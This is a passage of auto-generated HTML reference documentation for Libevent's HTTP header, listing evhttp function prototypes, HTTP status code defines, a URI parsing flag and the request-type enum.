<tr><td class="memItemLeft" align="right" valign="top">int </td><td class="memItemRight" valign="bottom"><a class="el" href="http_8h.html#a26b24365ab036cbce853fedc7818bc49">evhttp_del_cb</a> (struct <a class="el" href="structevhttp.html">evhttp</a> *, const char *)</td></tr>
<tr><td class="memItemLeft" align="right" valign="top">void </td><td class="memItemRight" valign="bottom"><a class="el" href="http_8h.html#ad3466287c0054d32dfd538a3bdfb0374">evhttp_set_gencb</a> (struct <a class="el" href="structevhttp.html">evhttp</a> *http, void(*cb)(struct <a class="el" href="structevhttp__request.html">evhttp_request</a> *, void *), void *arg)</td></tr>
<tr><td class="memItemLeft" align="right" valign="top">int </td><td class="memItemRight" valign="bottom"><a class="el" href="http_8h.html#a82d8fb72c5e8c76b787987ba5de5b141">evhttp_add_virtual_host</a> (struct <a class="el" href="structevhttp.html">evhttp</a> *http, const char *pattern, struct <a class="el" href="structevhttp.html">evhttp</a> *vhost)</td></tr>
<tr><td class="memItemLeft" align="right" valign="top">int </td><td class="memItemRight" valign="bottom"><a class="el" href="http_8h.html#ab2eb1ac82f36e7f0180b18d4553d3994">evhttp_remove_virtual_host</a> (struct <a class="el" href="structevhttp.html">evhttp</a> *http, struct <a class="el" href="structevhttp.html">evhttp</a> *vhost)</td></tr>
<tr><td class="memItemLeft" align="right" valign="top">int </td><td class="memItemRight" valign="bottom"><a class="el" href="http_8h.html#a58fe001925e7f65d7678bf90b31fc2a5">evhttp_add_server_alias</a> (struct <a class="el" href="structevhttp.html">evhttp</a> *http, const char *alias)</td></tr>
<tr><td class="memItemLeft" align="right" valign="top">int </td><td class="memItemRight" valign="bottom"><a class="el" href="http_8h.html#a88fe4c5507e88c4db284ea30a0478e5d">evhttp_remove_server_alias</a> (struct <a class="el" href="structevhttp.html">evhttp</a> *http, const char *alias)</td></tr>
<tr><td class="memItemLeft" align="right" valign="top">void </td><td class="memItemRight" valign="bottom"><a class="el" href="http_8h.html#acc8bb4d9e196f957510b5db9f6a02e44">evhttp_set_timeout</a> (struct <a class="el" href="structevhttp.html">evhttp</a> *http, int timeout_in_secs)</td></tr>
<tr><td class="memItemLeft" align="right" valign="top">void </td><td class="memItemRight" valign="bottom"><a class="el" href="http_8h.html#a629ef7f70ed916e162dee3bd12e397c9">evhttp_send_error</a> (struct <a class="el" href="structevhttp__request.html">evhttp_request</a> *req, int error, const char *reason)</td></tr>
<tr><td class="memItemLeft" align="right" valign="top">void </td><td class="memItemRight" valign="bottom"><a class="el" href="http_8h.html#a9df5ec9adc9bc664db5d6b161a293525">evhttp_send_reply</a> (struct <a class="el" href="structevhttp__request.html">evhttp_request</a> *req, int code, const char *reason, struct <a class="el" href="structevbuffer.html">evbuffer</a> *databuf)</td></tr>
<tr><td class="memItemLeft" align="right" valign="top">void </td><td class="memItemRight" valign="bottom"><a class="el" href="http_8h.html#a69c93aab46133521997cdfb8c2e07195">evhttp_send_reply_start</a> (struct <a class="el" href="structevhttp__request.html">evhttp_request</a> *req, int code, const char *reason)</td></tr>
<tr><td class="memItemLeft" align="right" valign="top">void </td><td class="memItemRight" valign="bottom"><a class="el" href="http_8h.html#a7950f70e66678fda56fdf8288811639c">evhttp_send_reply_chunk</a> (struct <a class="el" href="structevhttp__request.html">evhttp_request</a> *req, struct <a class="el" href="structevbuffer.html">evbuffer</a> *databuf)</td></tr>
<tr><td class="memItemLeft" align="right" valign="top">void </td><td class="memItemRight" valign="bottom"><a class="el" href="http_8h.html#a77024706313626c5857089b08ec5e0ae">evhttp_send_reply_end</a> (struct <a class="el" href="structevhttp__request.html">evhttp_request</a> *req)</td></tr>
<tr><td class="memItemLeft" align="right" valign="top">struct <a class="el" href="structevhttp__request.html">evhttp_request</a> * </td><td class="memItemRight" valign="bottom"><a class="el" href="http_8h.html#a2f40f147e37f9a40f8ef684fb8f2d6b0">evhttp_request_new</a> (void(*cb)(struct <a class="el" href="structevhttp__request.html">evhttp_request</a> *, void *), void *arg)</td></tr>
<tr><td class="memItemLeft" align="right" valign="top">void </td><td class="memItemRight" valign="bottom"><a class="el" href="http_8h.html#a3dd375d81eac9baabc53749ed025ec12">evhttp_request_set_chunked_cb</a> (struct <a class="el" href="structevhttp__request.html">evhttp_request</a> *, void(*cb)(struct <a class="el" href="structevhttp__request.html">evhttp_request</a> *, void *))</td></tr>
<tr><td class="memItemLeft" align="right" valign="top">void </td><td class="memItemRight" valign="bottom"><a class="el" href="http_8h.html#aad0392c873fa034be3ff09d4f8b68aba">evhttp_request_free</a> (struct <a class="el" href="structevhttp__request.html">evhttp_request</a> *req)</td></tr>
<tr><td class="memItemLeft" align="right" valign="top">struct <a class="el" href="structevhttp__connection.html">evhttp_connection</a> * </td><td class="memItemRight" valign="bottom"><a class="el" href="http_8h.html#af5913a2851880df25cf9ef43f7646074">evhttp_connection_base_new</a> (struct <a class="el" href="structevent__base.html">event_base</a> *base, struct <a class="el" href="structevdns__base.html">evdns_base</a> *dnsbase, const char *address, unsigned short port)</td></tr>
<tr><td class="memItemLeft" align="right" valign="top">struct <a class="el" href="structbufferevent.html">bufferevent</a> * </td><td class="memItemRight" valign="bottom"><a class="el" href="http_8h.html#a39cc41e2c07c0a2042ecdd05248bd645">evhttp_connection_get_bufferevent</a> (struct <a class="el" href="structevhttp__connection.html">evhttp_connection</a> *evcon)</td></tr>
<tr><td class="memItemLeft" align="right" valign="top">void </td><td class="memItemRight" valign="bottom"><a class="el" href="http_8h.html#a93a13d12f579bf22af35e2f1a6d82f4c">evhttp_request_own</a> (struct <a class="el" href="structevhttp__request.html">evhttp_request</a> *req)</td></tr>
<tr><td class="memItemLeft" align="right" valign="top">int </td><td class="memItemRight" valign="bottom"><a class="el" href="http_8h.html#a25516c0fb1b0ef47c81f623da3782bd1">evhttp_request_is_owned</a> (struct <a class="el" href="structevhttp__request.html">evhttp_request</a> *req)</td></tr>
<tr><td class="memItemLeft" align="right" valign="top">struct <a class="el" href="structevhttp__connection.html">evhttp_connection</a> * </td><td class="memItemRight" valign="bottom"><a class="el" href="http_8h.html#a92a534f00172fa452c45c9f3fc42d6f5">evhttp_request_get_connection</a> (struct <a class="el" href="structevhttp__request.html">evhttp_request</a> *req)</td></tr>
<tr><td class="memItemLeft" align="right" valign="top">struct <a class="el" href="structevent__base.html">event_base</a> * </td><td class="memItemRight" valign="bottom"><a class="el" href="http_8h.html#aeeec8fa8b1c5836d05a0e552793b0945">evhttp_connection_get_base</a> (struct <a class="el" href="structevhttp__connection.html">evhttp_connection</a> *req)</td></tr>
<tr><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="aeea564828181bbd3879b6af92224d4f6"></a><!-- doxytag: member="http.h::evhttp_connection_set_max_headers_size" ref="aeea564828181bbd3879b6af92224d4f6" args="(struct evhttp_connection *evcon, ev_ssize_t new_max_headers_size)" -->
void </td><td class="memItemRight" valign="bottom"><b>evhttp_connection_set_max_headers_size</b> (struct <a class="el" href="structevhttp__connection.html">evhttp_connection</a> *evcon, ev_ssize_t new_max_headers_size)</td></tr>
<tr><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="a05e5fc3a7488c3a32f28fde45d15c6e4"></a><!-- doxytag: member="http.h::evhttp_connection_set_max_body_size" ref="a05e5fc3a7488c3a32f28fde45d15c6e4" args="(struct evhttp_connection *evcon, ev_ssize_t new_max_body_size)" -->
void </td><td class="memItemRight" valign="bottom"><b>evhttp_connection_set_max_body_size</b> (struct <a class="el" href="structevhttp__connection.html">evhttp_connection</a> *evcon, ev_ssize_t new_max_body_size)</td></tr>
<tr><td class="memItemLeft" align="right" valign="top">void </td><td class="memItemRight" valign="bottom"><a class="el" href="http_8h.html#ab5afe0ffd71e479a9d830ac3800ba599">evhttp_connection_free</a> (struct <a class="el" href="structevhttp__connection.html">evhttp_connection</a> *evcon)</td></tr>
<tr><td class="memItemLeft" align="right" valign="top">void </td><td class="memItemRight" valign="bottom"><a class="el" href="http_8h.html#a839b6cd03f4377fead26e8b680e9cd7e">evhttp_connection_set_local_address</a> (struct <a class="el" href="structevhttp__connection.html">evhttp_connection</a> *evcon, const char *address)</td></tr>
<tr><td class="memItemLeft" align="right" valign="top">void </td><td class="memItemRight" valign="bottom"><a class="el" href="http_8h.html#a3a325b818c5c4f48a8ba1f3cf6a49d7f">evhttp_connection_set_local_port</a> (struct <a class="el" href="structevhttp__connection.html">evhttp_connection</a> *evcon, ev_uint16_t port)</td></tr>
<tr><td class="memItemLeft" align="right" valign="top">void </td><td class="memItemRight" valign="bottom"><a class="el" href="http_8h.html#aa145623b7f58efe51908c6e48060db8c">evhttp_connection_set_timeout</a> (struct <a class="el" href="structevhttp__connection.html">evhttp_connection</a> *evcon, int timeout_in_secs)</td></tr>
<tr><td class="memItemLeft" align="right" valign="top">void </td><td class="memItemRight" valign="bottom"><a class="el" href="http_8h.html#a9356b2a28a3b08bf273d027d1c40f470">evhttp_connection_set_retries</a> (struct <a class="el" href="structevhttp__connection.html">evhttp_connection</a> *evcon, int retry_max)</td></tr>
<tr><td class="memItemLeft" align="right" valign="top">void </td><td class="memItemRight" valign="bottom"><a class="el" href="http_8h.html#af62e12b843002e6eace204cc68da2277">evhttp_connection_set_closecb</a> (struct <a class="el" href="structevhttp__connection.html">evhttp_connection</a> *evcon, void(*)(struct <a class="el" href="structevhttp__connection.html">evhttp_connection</a> *, void *), void *)</td></tr>
<tr><td class="memItemLeft" align="right" valign="top">void </td><td class="memItemRight" valign="bottom"><a class="el" href="http_8h.html#afa866e15c757e815a2e66cba7c8aa161">evhttp_connection_get_peer</a> (struct <a class="el" href="structevhttp__connection.html">evhttp_connection</a> *evcon, char **address, ev_uint16_t *port)</td></tr>
<tr><td class="memItemLeft" align="right" valign="top">int </td><td class="memItemRight" valign="bottom"><a class="el" href="http_8h.html#a70af2a5e67da78782e06c640b9f85d4e">evhttp_make_request</a> (struct <a class="el" href="structevhttp__connection.html">evhttp_connection</a> *evcon, struct <a class="el" href="structevhttp__request.html">evhttp_request</a> *req, enum <a class="el" href="http_8h.html#ac858319d667267f9fc848c2bb6931aa3">evhttp_cmd_type</a> type, const char *uri)</td></tr>
<tr><td class="memItemLeft" align="right" valign="top">void </td><td class="memItemRight" valign="bottom"><a class="el" href="http_8h.html#ab323fe297168f0f87af832f2bddc40a0">evhttp_cancel_request</a> (struct <a class="el" href="structevhttp__request.html">evhttp_request</a> *req)</td></tr>
<tr><td class="memItemLeft" align="right" valign="top">const char * </td><td class="memItemRight" valign="bottom"><a class="el" href="http_8h.html#a78ce0bb30083afddb525cb9fa0b30ae0">evhttp_request_get_uri</a> (const struct <a class="el" href="structevhttp__request.html">evhttp_request</a> *req)</td></tr>
<tr><td class="memItemLeft" align="right" valign="top">struct <a class="el" href="structevhttp__uri.html">evhttp_uri</a> * </td><td class="memItemRight" valign="bottom"><a class="el" href="http_8h.html#a4cc0812787263e4473b2bd25fcade9c2">evhttp_request_get_evhttp_uri</a> (const struct <a class="el" href="structevhttp__request.html">evhttp_request</a> *req)</td></tr>
<tr><td class="memItemLeft" align="right" valign="top">enum <a class="el" href="http_8h.html#ac858319d667267f9fc848c2bb6931aa3">evhttp_cmd_type</a> </td><td class="memItemRight" valign="bottom"><a class="el" href="http_8h.html#a552bcfe23acec6858742e44a1b932dad">evhttp_request_get_command</a> (const struct <a class="el" href="structevhttp__request.html">evhttp_request</a> *req)</td></tr>
<tr><td class="memItemLeft" align="right" valign="top"><a class="anchor" id="ac1452ea8db0ddb07f52d5de739f026af"></a><!-- doxytag: member="http.h::evhttp_request_get_response_code" ref="ac1452ea8db0ddb07f52d5de739f026af" args="(const struct evhttp_request *req)" -->
int </td><td class="memItemRight" valign="bottom"><b>evhttp_request_get_response_code</b> (const struct <a class="el" href="structevhttp__request.html">evhttp_request</a> *req)</td></tr>
<tr><td class="memItemLeft" align="right" valign="top">struct evkeyvalq * </td><td class="memItemRight" valign="bottom"><a class="el" href="http_8h.html#a034fca99ce0cc5ff3b7f56744915a8be">evhttp_request_get_input_headers</a> (struct <a class="el" href="structevhttp__request.html">evhttp_request</a> *req)</td></tr>
<tr><td class="memItemLeft" align="right" valign="top">struct evkeyvalq * </td><td class="memItemRight" valign="bottom"><a class="el" href="http_8h.html#ae1321a89525b6336fce624e28de41b49">evhttp_request_get_output_headers</a> (struct <a class="el" href="structevhttp__request.html">evhttp_request</a> *req)</td></tr>
<tr><td class="memItemLeft" align="right" valign="top">struct <a class="el" href="structevbuffer.html">evbuffer</a> * </td><td class="memItemRight" valign="bottom"><a class="el" href="http_8h.html#aa939f28c8da2a8122097de23c7670321">evhttp_request_get_input_buffer</a> (struct <a class="el" href="structevhttp__request.html">evhttp_request</a> *req)</td></tr>
<tr><td class="memItemLeft" align="right" valign="top">struct <a class="el" href="structevbuffer.html">evbuffer</a> * </td><td class="memItemRight" valign="bottom"><a class="el" href="http_8h.html#a8dc23de32b242457db98ab566c53f71f">evhttp_request_get_output_buffer</a> (struct <a class="el" href="structevhttp__request.html">evhttp_request</a> *req)</td></tr>
<tr><td class="memItemLeft" align="right" valign="top">const char * </td><td class="memItemRight" valign="bottom"><a class="el" href="http_8h.html#aac84865e4848b8d9089e4182e12d185e">evhttp_request_get_host</a> (struct <a class="el" href="structevhttp__request.html">evhttp_request</a> *req)</td></tr>
<tr><td class="memItemLeft" align="right" valign="top">const char * </td><td class="memItemRight" valign="bottom"><a class="el" href="http_8h.html#a3a36842fd6f74977c9c0fb7aa5578832">evhttp_find_header</a> (const struct evkeyvalq *headers, const char *key)</td></tr>
<tr><td class="memItemLeft" align="right" valign="top">int </td><td class="memItemRight" valign="bottom"><a class="el" href="http_8h.html#ab87600f14a6f8c36beedbeed8267b856">evhttp_remove_header</a> (struct evkeyvalq *headers, const char *key)</td></tr>
<tr><td class="memItemLeft" align="right" valign="top">int </td><td class="memItemRight" valign="bottom"><a class="el" href="http_8h.html#a04e3f41c14b8e0e74da13a8d308b93b7">evhttp_add_header</a> (struct evkeyvalq *headers, const char *key, const char *value)</td></tr>
<tr><td class="memItemLeft" align="right" valign="top">void </td><td class="memItemRight" valign="bottom"><a class="el" href="http_8h.html#adfd33f73c8d7af63a0da05ebb32b7e72">evhttp_clear_headers</a> (struct evkeyvalq *headers)</td></tr>
<tr><td class="memItemLeft" align="right" valign="top">char * </td><td class="memItemRight" valign="bottom"><a class="el" href="http_8h.html#a2b6d14272efe8d5f6bb110666a2032fd">evhttp_encode_uri</a> (const char *str)</td></tr>
<tr><td class="memItemLeft" align="right" valign="top">char * </td><td class="memItemRight" valign="bottom"><a class="el" href="http_8h.html#ab64229249a981ccfea09161a199972da">evhttp_uriencode</a> (const char *str, ev_ssize_t size, int space_to_plus)</td></tr>
<tr><td class="memItemLeft" align="right" valign="top">char * </td><td class="memItemRight" valign="bottom"><a class="el" href="http_8h.html#a681a8e967dec9f73fb8e27f465fdae4b">evhttp_decode_uri</a> (const char *uri)</td></tr>
<tr><td class="memItemLeft" align="right" valign="top">char * </td><td class="memItemRight" valign="bottom"><a class="el" href="http_8h.html#ac2914389616f04199aded10444fd8e42">evhttp_uridecode</a> (const char *uri, int decode_plus, size_t *size_out)</td></tr>
<tr><td class="memItemLeft" align="right" valign="top">int </td><td class="memItemRight" valign="bottom"><a class="el" href="http_8h.html#a12d3940d23fb53c38106f8ac0d3dfff6">evhttp_parse_query</a> (const char *uri, struct evkeyvalq *headers)</td></tr>
<tr><td class="memItemLeft" align="right" valign="top">int </td><td class="memItemRight" valign="bottom"><a class="el" href="http_8h.html#a1598fb5757f39dde6dc43dee9a2e7fca">evhttp_parse_query_str</a> (const char *uri, struct evkeyvalq *headers)</td></tr>
<tr><td class="memItemLeft" align="right" valign="top">char * </td><td class="memItemRight" valign="bottom"><a class="el" href="http_8h.html#ac9318bd77cb5f4030b434bea99b3828e">evhttp_htmlescape</a> (const char *html)</td></tr>
<tr><td class="memItemLeft" align="right" valign="top">struct <a class="el" href="structevhttp__uri.html">evhttp_uri</a> * </td><td class="memItemRight" valign="bottom"><a class="el" href="http_8h.html#a2847be10a24befd3c65d412690475110">evhttp_uri_new</a> (void)</td></tr>
<tr><td class="memItemLeft" align="right" valign="top">void </td><td class="memItemRight" valign="bottom"><a class="el" href="http_8h.html#aea0b990f1ca5ba71feffa96c8f6bd06b">evhttp_uri_set_flags</a> (struct <a class="el" href="structevhttp__uri.html">evhttp_uri</a> *uri, unsigned flags)</td></tr>
<tr><td class="memItemLeft" align="right" valign="top">const char * </td><td class="memItemRight" valign="bottom"><a class="el" href="http_8h.html#a6f49cc20f421d2f66907c613d24ad3dc">evhttp_uri_get_scheme</a> (const struct <a class="el" href="structevhttp__uri.html">evhttp_uri</a> *uri)</td></tr>
<tr><td class="memItemLeft" align="right" valign="top">const char * </td><td class="memItemRight" valign="bottom"><a class="el" href="http_8h.html#adfc9eeca8691a9f55dad523e60f1a467">evhttp_uri_get_userinfo</a> (const struct <a class="el" href="structevhttp__uri.html">evhttp_uri</a> *uri)</td></tr>
<tr><td class="memItemLeft" align="right" valign="top">const char * </td><td class="memItemRight" valign="bottom"><a class="el" href="http_8h.html#a2d45134ab552432fbe25eb2ff646f906">evhttp_uri_get_host</a> (const struct <a class="el" href="structevhttp__uri.html">evhttp_uri</a> *uri)</td></tr>
<tr><td class="memItemLeft" align="right" valign="top">int </td><td class="memItemRight" valign="bottom"><a class="el" href="http_8h.html#a60d456504f4f93f61384eb0b526f5a4c">evhttp_uri_get_port</a> (const struct <a class="el" href="structevhttp__uri.html">evhttp_uri</a> *uri)</td></tr>
<tr><td class="memItemLeft" align="right" valign="top">const char * </td><td class="memItemRight" valign="bottom"><a class="el" href="http_8h.html#a49e685022515780b3dfb4d944b4cce4d">evhttp_uri_get_path</a> (const struct <a class="el" href="structevhttp__uri.html">evhttp_uri</a> *uri)</td></tr>
<tr><td class="memItemLeft" align="right" valign="top">const char * </td><td class="memItemRight" valign="bottom"><a class="el" href="http_8h.html#a9a8c53b664a23dbdebd99d768a17590e">evhttp_uri_get_query</a> (const struct <a class="el" href="structevhttp__uri.html">evhttp_uri</a> *uri)</td></tr>
<tr><td class="memItemLeft" align="right" valign="top">const char * </td><td class="memItemRight" valign="bottom"><a class="el" href="http_8h.html#ad7fcd64c02bb074bc9c754e8107550c1">evhttp_uri_get_fragment</a> (const struct <a class="el" href="structevhttp__uri.html">evhttp_uri</a> *uri)</td></tr>
<tr><td class="memItemLeft" align="right" valign="top">int </td><td class="memItemRight" valign="bottom"><a class="el" href="http_8h.html#abf5f82fb9c8f8df0b1b4c73691791dd5">evhttp_uri_set_scheme</a> (struct <a class="el" href="structevhttp__uri.html">evhttp_uri</a> *uri, const char *scheme)</td></tr>
<tr><td class="memItemLeft" align="right" valign="top">int </td><td class="memItemRight" valign="bottom"><a class="el" href="http_8h.html#ac7b10b8ef8ee94d14674f9329486d355">evhttp_uri_set_userinfo</a> (struct <a class="el" href="structevhttp__uri.html">evhttp_uri</a> *uri, const char *userinfo)</td></tr>
<tr><td class="memItemLeft" align="right" valign="top">int </td><td class="memItemRight" valign="bottom"><a class="el" href="http_8h.html#a103c447efb9f41a5897b3aa130424734">evhttp_uri_set_host</a> (struct <a class="el" href="structevhttp__uri.html">evhttp_uri</a> *uri, const char *host)</td></tr>
<tr><td class="memItemLeft" align="right" valign="top">int </td><td class="memItemRight" valign="bottom"><a class="el" href="http_8h.html#a8cc430f9b8fb4c6aa11692d5ef0b383c">evhttp_uri_set_port</a> (struct <a class="el" href="structevhttp__uri.html">evhttp_uri</a> *uri, int port)</td></tr>
<tr><td class="memItemLeft" align="right" valign="top">int </td><td class="memItemRight" valign="bottom"><a class="el" href="http_8h.html#ae6bbfc5cf62df674ba72800ea46c5828">evhttp_uri_set_path</a> (struct <a class="el" href="structevhttp__uri.html">evhttp_uri</a> *uri, const char *path)</td></tr>
<tr><td class="memItemLeft" align="right" valign="top">int </td><td class="memItemRight" valign="bottom"><a class="el" href="http_8h.html#aaf999637136bc1785e5d75c191c671ba">evhttp_uri_set_query</a> (struct <a class="el" href="structevhttp__uri.html">evhttp_uri</a> *uri, const char *query)</td></tr>
<tr><td class="memItemLeft" align="right" valign="top">int </td><td class="memItemRight" valign="bottom"><a class="el" href="http_8h.html#a36b844028058c82b6709d1e0fe7e1cf9">evhttp_uri_set_fragment</a> (struct <a class="el" href="structevhttp__uri.html">evhttp_uri</a> *uri, const char *fragment)</td></tr>
<tr><td class="memItemLeft" align="right" valign="top">struct <a class="el" href="structevhttp__uri.html">evhttp_uri</a> * </td><td class="memItemRight" valign="bottom"><a class="el" href="http_8h.html#ad9f9447cb1c3c92e40478b98ff30db60">evhttp_uri_parse_with_flags</a> (const char *source_uri, unsigned flags)</td></tr>
<tr><td class="memItemLeft" align="right" valign="top">struct <a class="el" href="structevhttp__uri.html">evhttp_uri</a> * </td><td class="memItemRight" valign="bottom"><a class="el" href="http_8h.html#a47bc072177c8e839083c511a618a422c">evhttp_uri_parse</a> (const char *source_uri)</td></tr>
<tr><td class="memItemLeft" align="right" valign="top">void </td><td class="memItemRight" valign="bottom"><a class="el" href="http_8h.html#a5ee82311278b8fda3ed93a8e358683bb">evhttp_uri_free</a> (struct <a class="el" href="structevhttp__uri.html">evhttp_uri</a> *uri)</td></tr>
<tr><td class="memItemLeft" align="right" valign="top">char * </td><td class="memItemRight" valign="bottom"><a class="el" href="http_8h.html#a60f7217fccc2bdfb9cb6abeb1c4ad102">evhttp_uri_join</a> (struct <a class="el" href="structevhttp__uri.html">evhttp_uri</a> *uri, char *buf, size_t limit)</td></tr>
</table>
<hr/><a name="details" id="details"></a><h2>Detailed Description</h2>
<div class="textblock"><p>Basic support for HTTP serving.</p>
<p>As Libevent is a library for dealing with event notification and most interesting applications are networked today, I have often found the need to write HTTP code. The following prototypes and definitions provide an application with a minimal interface for making HTTP requests and for creating a very simple HTTP server. </p>
</div><hr/><h2>Define Documentation</h2>
<a class="anchor" id="ace576911d436a163584f4942907270a5"></a><!-- doxytag: member="http.h::EVHTTP_URI_NONCONFORMANT" ref="ace576911d436a163584f4942907270a5" args="" -->
<div class="memitem">
<div class="memproto">
<table class="memname">
<tr>
<td class="memname">#define <a class="el" href="http_8h.html#ace576911d436a163584f4942907270a5">EVHTTP_URI_NONCONFORMANT</a>   0x01</td>
</tr>
</table>
</div>
<div class="memdoc">
<p>Tolerate URIs that do not conform to RFC3986.</p>
<p>Unfortunately, some HTTP clients generate URIs that, according to RFC3986, are not conformant URIs. If you need to support these URIs, you can do so by passing this flag to evhttp_uri_parse_with_flags.</p>
<p>Currently, these changes are: </p>
<ul>
<li>
Nonconformant URIs are allowed to contain otherwise unreasonable characters in their path, query, and fragment components. </li>
</ul>
</div>
</div>
<a class="anchor" id="a8d93bc2b08ddc194c213682c4726b0e6"></a><!-- doxytag: member="http.h::HTTP_BADMETHOD" ref="a8d93bc2b08ddc194c213682c4726b0e6" args="" -->
<div class="memitem">
<div class="memproto">
<table class="memname">
<tr>
<td class="memname">#define <a class="el" href="http_8h.html#a8d93bc2b08ddc194c213682c4726b0e6">HTTP_BADMETHOD</a>   405</td>
</tr>
</table>
</div>
<div class="memdoc">
<p>method not allowed for this uri </p>
</div>
</div>
<a class="anchor" id="af9f070802de32cd2f820059fc42cbf39"></a><!-- doxytag: member="http.h::HTTP_BADREQUEST" ref="af9f070802de32cd2f820059fc42cbf39" args="" -->
<div class="memitem">
<div class="memproto">
<table class="memname">
<tr>
<td class="memname">#define <a class="el" href="http_8h.html#af9f070802de32cd2f820059fc42cbf39">HTTP_BADREQUEST</a>   400</td>
</tr>
</table>
</div>
<div class="memdoc">
<p>invalid http request was made </p>
</div>
</div>
<a class="anchor" id="a64236d9bad703199d84a08bee90e00f0"></a><!-- doxytag: member="http.h::HTTP_ENTITYTOOLARGE" ref="a64236d9bad703199d84a08bee90e00f0" args="" -->
<div class="memitem">
<div class="memproto">
<table class="memname">
<tr>
<td class="memname">#define <a class="el" href="http_8h.html#a64236d9bad703199d84a08bee90e00f0">HTTP_ENTITYTOOLARGE</a>   413</td>
</tr>
</table>
</div>
<div class="memdoc">
</div>
</div>
<a class="anchor" id="a4eac9f52d3d8de9b3deadaec6ad0bee9"></a><!-- doxytag: member="http.h::HTTP_EXPECTATIONFAILED" ref="a4eac9f52d3d8de9b3deadaec6ad0bee9" args="" -->
<div class="memitem">
<div class="memproto">
<table class="memname">
<tr>
<td class="memname">#define <a class="el" href="http_8h.html#a4eac9f52d3d8de9b3deadaec6ad0bee9">HTTP_EXPECTATIONFAILED</a>   417</td>
</tr>
</table>
</div>
<div class="memdoc">
<p>we can't handle this expectation </p>
</div>
</div>
<a class="anchor" id="a15eac402986428a8125d364b7ae569b1"></a><!-- doxytag: member="http.h::HTTP_INTERNAL" ref="a15eac402986428a8125d364b7ae569b1" args="" -->
<div class="memitem">
<div class="memproto">
<table class="memname">
<tr>
<td class="memname">#define <a class="el" href="http_8h.html#a15eac402986428a8125d364b7ae569b1">HTTP_INTERNAL</a>   500</td>
</tr>
</table>
</div>
<div class="memdoc">
<p>internal error </p>
</div>
</div>
<a class="anchor" id="ac6ffbb7b69889f1eee0d413576c609a9"></a><!-- doxytag: member="http.h::HTTP_MOVEPERM" ref="ac6ffbb7b69889f1eee0d413576c609a9" args="" -->
<div class="memitem">
<div class="memproto">
<table class="memname">
<tr>
<td class="memname">#define <a class="el" href="http_8h.html#ac6ffbb7b69889f1eee0d413576c609a9">HTTP_MOVEPERM</a>   301</td>
</tr>
</table>
</div>
<div class="memdoc">
<p>the uri moved permanently </p>
</div>
</div>
<a class="anchor" id="a7d2a7341ba2af15babe8c25df67e563f"></a><!-- doxytag: member="http.h::HTTP_MOVETEMP" ref="a7d2a7341ba2af15babe8c25df67e563f" args="" -->
<div class="memitem">
<div class="memproto">
<table class="memname">
<tr>
<td class="memname">#define <a class="el" href="http_8h.html#a7d2a7341ba2af15babe8c25df67e563f">HTTP_MOVETEMP</a>   302</td>
</tr>
</table>
</div>
<div class="memdoc">
<p>the uri moved temporarily </p>
</div>
</div>
<a class="anchor" id="ac5e3a483119375a05d199c30709f2b8e"></a><!-- doxytag: member="http.h::HTTP_NOCONTENT" ref="ac5e3a483119375a05d199c30709f2b8e" args="" -->
<div class="memitem">
<div class="memproto">
<table class="memname">
<tr>
<td class="memname">#define <a class="el" href="http_8h.html#ac5e3a483119375a05d199c30709f2b8e">HTTP_NOCONTENT</a>   204</td>
</tr>
</table>
</div>
<div class="memdoc">
<p>request does not have content </p>
</div>
</div>
<a class="anchor" id="a1f5b9c02b018640c890e5f27207fa6c0"></a><!-- doxytag: member="http.h::HTTP_NOTFOUND" ref="a1f5b9c02b018640c890e5f27207fa6c0" args="" -->
<div class="memitem">
<div class="memproto">
<table class="memname">
<tr>
<td class="memname">#define <a class="el" href="http_8h.html#a1f5b9c02b018640c890e5f27207fa6c0">HTTP_NOTFOUND</a>   404</td>
</tr>
</table>
</div>
<div class="memdoc">
<p>could not find content for uri </p>
</div>
</div>
<a class="anchor" id="a9759dd4ad026a688142afb7b4e4542cc"></a><!-- doxytag: member="http.h::HTTP_NOTIMPLEMENTED" ref="a9759dd4ad026a688142afb7b4e4542cc" args="" -->
<div class="memitem">
<div class="memproto">
<table class="memname">
<tr>
<td class="memname">#define <a class="el" href="http_8h.html#a9759dd4ad026a688142afb7b4e4542cc">HTTP_NOTIMPLEMENTED</a>   501</td>
</tr>
</table>
</div>
<div class="memdoc">
<p>not implemented </p>
</div>
</div>
<a class="anchor" id="a3112d58297965db46a04fe288bf1d0da"></a><!-- doxytag: member="http.h::HTTP_NOTMODIFIED" ref="a3112d58297965db46a04fe288bf1d0da" args="" -->
<div class="memitem">
<div class="memproto">
<table class="memname">
<tr>
<td class="memname">#define <a class="el" href="http_8h.html#a3112d58297965db46a04fe288bf1d0da">HTTP_NOTMODIFIED</a>   304</td>
</tr>
</table>
</div>
<div class="memdoc">
<p>page was not modified from last </p>
</div>
</div>
<a class="anchor" id="a02e6d59009dee759528ec81fc9a8eeff"></a><!-- doxytag: member="http.h::HTTP_OK" ref="a02e6d59009dee759528ec81fc9a8eeff" args="" -->
<div class="memitem">
<div class="memproto">
<table class="memname">
<tr>
<td class="memname">#define <a class="el" href="http_8h.html#a02e6d59009dee759528ec81fc9a8eeff">HTTP_OK</a>   200</td>
</tr>
</table>
</div>
<div class="memdoc">
<p>request completed ok </p>
</div>
</div>
<a class="anchor" id="a5fd6829fe2bb38dd13288f11dcb2025f"></a><!-- doxytag: member="http.h::HTTP_SERVUNAVAIL" ref="a5fd6829fe2bb38dd13288f11dcb2025f" args="" -->
<div class="memitem">
<div class="memproto">
<table class="memname">
<tr>
<td class="memname">#define <a class="el" href="http_8h.html#a5fd6829fe2bb38dd13288f11dcb2025f">HTTP_SERVUNAVAIL</a>   503</td>
</tr>
</table>
</div>
<div class="memdoc">
<p>the server is not available </p>
</div>
</div>
<hr/><h2>Enumeration Type Documentation</h2>
<a class="anchor" id="ac858319d667267f9fc848c2bb6931aa3"></a><!-- doxytag: member="http.h::evhttp_cmd_type" ref="ac858319d667267f9fc848c2bb6931aa3" args="" -->
<div class="memitem">
<div class="memproto">
<table class="memname">
<tr>
<td class="memname">enum <a class="el" href="http_8h.html#ac858319d667267f9fc848c2bb6931aa3">evhttp_cmd_type</a></td>
</tr>
</table>
</div>
<div class="memdoc">
<p>The different request types supported by evhttp. These are as specified in RFC2616, except for PATCH which is specified by RFC5789.</p>
<p>By default, only some of these methods are accepted and passed to user callbacks; use <a class="el" href="http_8h.html#ae63a0370f59570e00753f7fb512a7f59">evhttp_set_allowed_methods()</a> to change which methods are allowed. </p>
</div>
</div>
<a class="anchor" id="a47ca41a942899d019bf59cf32301ae4f"></a><!-- doxytag: member="http.h::evhttp_request_kind" ref="a47ca41a942899d019bf59cf32301ae4f" args="" -->
